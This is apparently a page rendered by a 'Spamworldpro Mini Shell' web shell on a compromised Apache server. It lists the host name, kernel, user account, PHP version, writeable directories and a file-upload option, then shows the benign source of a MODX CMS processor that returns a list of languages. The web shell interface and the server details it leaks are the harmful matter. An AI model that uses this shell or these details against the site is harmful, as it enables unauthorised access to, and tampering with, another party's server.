Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux indy02.toastserver.com 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : palandch ( 1163)
PHP Version : 7.1.33
Disable Function : NONE
Directory :  /home/palandch/www/core/model/modx/processors/system/language/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/palandch/www/core/model/modx/processors/system/language/getlist.class.php
<?php
/**
 * Grabs a list of lexicon languages
 *
 * @param integer $start (optional) The record to start at. Defaults to 0.
 * @param integer $limit (optional) The number of records to limit to. Defaults
 * to 10.
 *
 * @package modx
 * @subpackage processors.system.language
 */
class modSystemLanguageGetListProcessor extends modProcessor {
    public function checkPermissions() {
        return $this->modx->hasPermission('languages');
    }
    public function getLanguageTopics() {
        return array('lexicon');
    }
    public function initialize() {
        $this->setDefaultProperties(array(
            'start' => 0,
            'limit' => 10,
            'namespace' => 'core',
        ));
        return true;
    }
    public function process() {
        $data = $this->getData();
        if (empty($data)) return $this->failure();
        
        /* loop through */
        $list = array();
        foreach ($data['results'] as $language) {
            $list[] = array(
                'name' => $language,
            );
        }

        return $this->outputArray($list,$data['total']);
    }

    /**
     * Get a collection of languages
     * @return array
     */
    public function getData() {
        $data = array();

        $limit = $this->getProperty('limit',10);
        $isLimit = !empty($limit);

        $data['results'] = $this->modx->lexicon->getLanguageList($this->getProperty('namespace'));
        $data['total'] = count($data['results']);

        if ($isLimit) {
            $data['results'] = array_slice($data['results'],$this->getProperty('start'),$limit,true);
        }
        return $data;
    }
}
return 'modSystemLanguageGetListProcessor';

Spamworldpro Mini